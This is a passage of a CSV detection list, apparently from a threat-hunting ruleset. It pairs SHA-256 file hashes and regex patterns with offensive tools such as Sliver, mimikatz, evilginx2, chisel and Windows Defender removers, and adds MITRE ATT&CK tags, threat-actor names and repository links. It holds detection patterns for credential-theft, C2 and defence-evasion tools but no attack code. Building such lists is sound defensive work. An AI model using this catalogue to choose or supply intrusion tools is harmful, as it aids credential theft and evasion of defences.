SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22943"
"*1eec102c2cf354bbc7ae4c188a88920bed7cabcbf91c8b8cf194c996da73ff6b*",".{0,1000}1eec102c2cf354bbc7ae4c188a88920bed7cabcbf91c8b8cf194c996da73ff6b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22944"
"*1eee1c70a5c3d9b5110eecc51ca38009bc720c5380444bd7e022f593d2f981c9*",".{0,1000}1eee1c70a5c3d9b5110eecc51ca38009bc720c5380444bd7e022f593d2f981c9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22945"
"*1ef141bd8ce85451d8764a862ed5d16d3140735f868843cb2f96a15cd7623df6*",".{0,1000}1ef141bd8ce85451d8764a862ed5d16d3140735f868843cb2f96a15cd7623df6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22946"
"*1ef59c9201490b379ef17e7bb62adb414e2920e3daae6e866f230567fb0c5866*",".{0,1000}1ef59c9201490b379ef17e7bb62adb414e2920e3daae6e866f230567fb0c5866.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22947"
"*1ef6c1a4dfdc39b63bfe650ca81ab89510de6c0d3d7c608ac5be80033e559326*",".{0,1000}1ef6c1a4dfdc39b63bfe650ca81ab89510de6c0d3d7c608ac5be80033e559326.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22948"
"*1ef6c1a4dfdc39b63bfe650ca81ab89510de6c0d3d7c608ac5be80033e559326*",".{0,1000}1ef6c1a4dfdc39b63bfe650ca81ab89510de6c0d3d7c608ac5be80033e559326.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22949"
"*1ef9ec4d4ce0179495d5293ec8ad7a9bd80b5f83652b178f1871258cc78a0a9a*",".{0,1000}1ef9ec4d4ce0179495d5293ec8ad7a9bd80b5f83652b178f1871258cc78a0a9a.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22950"
"*1efc5368bcd9704d7df85e2e143936d6ee4509ac31a7ca6d3eb4cf3b18c5ef27*",".{0,1000}1efc5368bcd9704d7df85e2e143936d6ee4509ac31a7ca6d3eb4cf3b18c5ef27.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22951"
"*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*",".{0,1000}1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","22952"
"*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*",".{0,1000}1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","22953"
"*1f09a88ab2eca35f7e5abd4cc2f11a8f25cd7a060a5c3a943ee88e66fa241dd0*",".{0,1000}1f09a88ab2eca35f7e5abd4cc2f11a8f25cd7a060a5c3a943ee88e66fa241dd0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22954"
"*1f0d9cbab0c3d005348e0114cf5b3695ec49e888a9ec20d5a0467b6bc257f683*",".{0,1000}1f0d9cbab0c3d005348e0114cf5b3695ec49e888a9ec20d5a0467b6bc257f683.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22955"
"*1f0ff9ff279c93bf55a124a2ac36a4b7e97b77cfd7cdd221375b1449b7c286b1*",".{0,1000}1f0ff9ff279c93bf55a124a2ac36a4b7e97b77cfd7cdd221375b1449b7c286b1.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22957"
"*1f17ea5b2d547497145f092cc3b7f0ed8acbb821946a5d3265423b7262f2aa4f*",".{0,1000}1f17ea5b2d547497145f092cc3b7f0ed8acbb821946a5d3265423b7262f2aa4f.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","#filehash","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","22959"
"*1f182f07f495949b4d2fbeb4582e7e30ee75ff7da5f1fe4773a9893c90d0f9cb*",".{0,1000}1f182f07f495949b4d2fbeb4582e7e30ee75ff7da5f1fe4773a9893c90d0f9cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22961"
"*1f2338d7b628374139d373af383a1bdec1a16b43ced015849c6be4e4d90cc2c3*",".{0,1000}1f2338d7b628374139d373af383a1bdec1a16b43ced015849c6be4e4d90cc2c3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22963"
"*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*",".{0,1000}1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22964"
"*1f28b88a26c282842ad06aa962b62120f44bbecece84394c2498e784ceafa526*",".{0,1000}1f28b88a26c282842ad06aa962b62120f44bbecece84394c2498e784ceafa526.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22965"
"*1f29193837f8b7b8ba8c473a6949bd1520e54a2880303cd8aceabbb030f13aed*",".{0,1000}1f29193837f8b7b8ba8c473a6949bd1520e54a2880303cd8aceabbb030f13aed.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22966"
"*1f29c6c323670aea8b723f59e97bb8846346cead57eca4159f7f27287017ce7d*",".{0,1000}1f29c6c323670aea8b723f59e97bb8846346cead57eca4159f7f27287017ce7d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22967"
"*1f2f0252b887f796b461470b41800ed90a8f52b3ce65429e8e80e7af7b42dace*",".{0,1000}1f2f0252b887f796b461470b41800ed90a8f52b3ce65429e8e80e7af7b42dace.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22969"
"*1f350bc4b39f1e89f64366e08af152badfb9756d600b5e611af2433b1e0d3687*",".{0,1000}1f350bc4b39f1e89f64366e08af152badfb9756d600b5e611af2433b1e0d3687.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22970"
"*1f385acf11f8ea6673d7295be6492ea9913b525da25dcc037ea49ef4f86a9d58*",".{0,1000}1f385acf11f8ea6673d7295be6492ea9913b525da25dcc037ea49ef4f86a9d58.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","#filehash","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","22971"
"*1f38f5c7634978f31ac73800ad48c548b97dce8a7264d15fd5d2d9dea9d8416f*",".{0,1000}1f38f5c7634978f31ac73800ad48c548b97dce8a7264d15fd5d2d9dea9d8416f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22972"
"*1f39ce08fe915d5a346405fcacf6287c772c7c3fcb609bc34d32a5c90afe8050*",".{0,1000}1f39ce08fe915d5a346405fcacf6287c772c7c3fcb609bc34d32a5c90afe8050.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22973"
"*1f3a6d3687d57689a7ba7ff64c30fa268fa1e6fffc0021c3c01a2e0b11a069ec*",".{0,1000}1f3a6d3687d57689a7ba7ff64c30fa268fa1e6fffc0021c3c01a2e0b11a069ec.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22974"
"*1f4a265fc64ca0cee0bf95e15d039a1a8c587cd1fb7b41de536226a679bed4a3*",".{0,1000}1f4a265fc64ca0cee0bf95e15d039a1a8c587cd1fb7b41de536226a679bed4a3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22976"
"*1f4b9fe826113f8139be95e894e033044d0ddd185f9a2f30fcf213852f007790*",".{0,1000}1f4b9fe826113f8139be95e894e033044d0ddd185f9a2f30fcf213852f007790.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","22977"
"*1f4fc2020e9da18d8783fe9e98b702229756849eb1ef87ee199a94c8ab123f10*",".{0,1000}1f4fc2020e9da18d8783fe9e98b702229756849eb1ef87ee199a94c8ab123f10.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","22978"
"*1f5376413ef092ba7c8e6e6e0eab87024923fbf52600180c6452c247ada39cfe*",".{0,1000}1f5376413ef092ba7c8e6e6e0eab87024923fbf52600180c6452c247ada39cfe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22980"
"*1f607d81f474d120730e81149d0597ad822da8fe41eacacc7dac394d0a2df4d1*",".{0,1000}1f607d81f474d120730e81149d0597ad822da8fe41eacacc7dac394d0a2df4d1.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","22981"
"*1f63e243a7469526eb57f6d08a8d14fbb58290eb999247a005679809fc307edb*",".{0,1000}1f63e243a7469526eb57f6d08a8d14fbb58290eb999247a005679809fc307edb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22983"
"*1f6ecaca9176f820ea33f658c34cfcce3d33cb669c8a9184b4fb431ee791f7a2*",".{0,1000}1f6ecaca9176f820ea33f658c34cfcce3d33cb669c8a9184b4fb431ee791f7a2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22985"
"*1f7552f9d41f1e64d15e8cface42784b169d197992a072cf0072072dc640f58d*",".{0,1000}1f7552f9d41f1e64d15e8cface42784b169d197992a072cf0072072dc640f58d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22986"
"*1f75919c77b307ea48ba3dacb257e8b9d13c25db0456bdf9597611971f584f3b*",".{0,1000}1f75919c77b307ea48ba3dacb257e8b9d13c25db0456bdf9597611971f584f3b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22987"
"*1f7c4485debf950cfd5b7442d391d71de3bdc1b041993be5238847e7d6f50ba4*",".{0,1000}1f7c4485debf950cfd5b7442d391d71de3bdc1b041993be5238847e7d6f50ba4.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22988"
"*1f7c4485debf950cfd5b7442d391d71de3bdc1b041993be5238847e7d6f50ba4*",".{0,1000}1f7c4485debf950cfd5b7442d391d71de3bdc1b041993be5238847e7d6f50ba4.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22989"
"*1f7d9978478d481767a5c0a2aee4cee9a57d52c4453ec208869ef4def523e676*",".{0,1000}1f7d9978478d481767a5c0a2aee4cee9a57d52c4453ec208869ef4def523e676.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22990"
"*1f814aab831b7854e120d10e1560fb755683ec282b1b740c2021f8d1de03bd3c*",".{0,1000}1f814aab831b7854e120d10e1560fb755683ec282b1b740c2021f8d1de03bd3c.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","22991"
"*1f836b4cdd973bf9a2f55082dff78600498c66597496f044dffcac82a332e4f4*",".{0,1000}1f836b4cdd973bf9a2f55082dff78600498c66597496f044dffcac82a332e4f4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22992"
"*1f91cc9649031c4c80acf0d1823d439b4d49b89fc7caadf035a3260843ec950a*",".{0,1000}1f91cc9649031c4c80acf0d1823d439b4d49b89fc7caadf035a3260843ec950a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22994"
"*1fac4f23feef2cd992baa85443ed71ea2fbdfc93c602719ae6b60b2e67318ec5*",".{0,1000}1fac4f23feef2cd992baa85443ed71ea2fbdfc93c602719ae6b60b2e67318ec5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22997"
"*1fad05fba304c7d47366a1737745df64437909decdd85ca8aeab97a9ff55d056*",".{0,1000}1fad05fba304c7d47366a1737745df64437909decdd85ca8aeab97a9ff55d056.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22998"
"*1fbe379890b750ffed5f6702f7d69be790d592ccb2a29872155cadee91dd5268*",".{0,1000}1fbe379890b750ffed5f6702f7d69be790d592ccb2a29872155cadee91dd5268.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23001"
